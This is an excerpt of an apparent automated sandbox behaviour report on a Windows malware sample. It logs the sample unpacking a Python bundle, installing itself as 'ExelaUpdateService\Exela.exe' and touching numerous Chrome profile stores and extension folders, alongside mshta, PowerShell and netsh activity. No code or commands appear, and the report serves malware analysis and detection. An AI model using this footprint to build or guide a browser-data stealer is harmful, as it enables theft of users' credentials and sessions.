            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
